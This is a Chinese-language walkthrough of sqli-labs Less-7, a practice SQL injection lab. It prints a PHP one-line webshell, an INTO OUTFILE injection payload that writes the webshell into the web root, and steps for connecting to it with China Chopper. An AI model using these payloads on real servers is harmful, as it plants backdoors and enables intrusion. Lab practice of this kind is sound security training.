zoukankan      html  css  js  c++  java
  • sql-lab闯关之7

    LESS7
    知识铺垫:
    1.

    一句话木马有多个版本的,asp php的

    这里我们只用到php版本的一句话木马:

    <?php @eval($_POST[“crow”]);?> 其中crow是密码

    一句话木马大多配合中国菜刀使用,菜刀的使用可以参考:https://www.daixiaorui.com/read/17.html

    2.
    用到的两个函数:load_file()  读取本地文件  into outfile 写文件    可以百度函数用法,提示路径需要用双斜线

    3.
    使用phpstudy 存在文件读写权限问题
    在phpstduy文件 C:phpstudyPHPTutorialMySQLmy.ini 下加入secure_file_priv=“/”

    开始闯关

     提示use outfile 存在注入漏洞
    输入?id=’通过观察源码我们可以发现参数格式为((‘’))


     然后我们通过写入文件的函数将一句话木马写入文件
    输入?id=-1')) union select 1,2,'<?php @eval($_POST[“crow”]);?>' into outfile "C:\phpstduy2018\PHPTutorial\WWW\sqli-labs-master\Less-7\test.php" --+

     虽然提示报错,但是打开目的文件我们发现已经存在文件test.php了,

     现在我们打开中国菜刀进行连接,输入我们写的文件路径,以及密码,密码就是引号中间的crow


    成功进入。

  • 相关阅读:
    SUSE10 SP2/SP3 无规律死机故障解决
    随机铃声
    linux添加开机启动项
    SUSE Linux ShutdownManager issue
    linux添加开机启动项
    两个正在运行的activity之间的通信
    android 获取屏幕大小
    Linux开机启动过程分析
    grid的宽度设为100%问题
    动态处理editGridPanel
  • 原文地址:https://www.cnblogs.com/c1047509362/p/12356354.html
Copyright © 2011-2022 走看看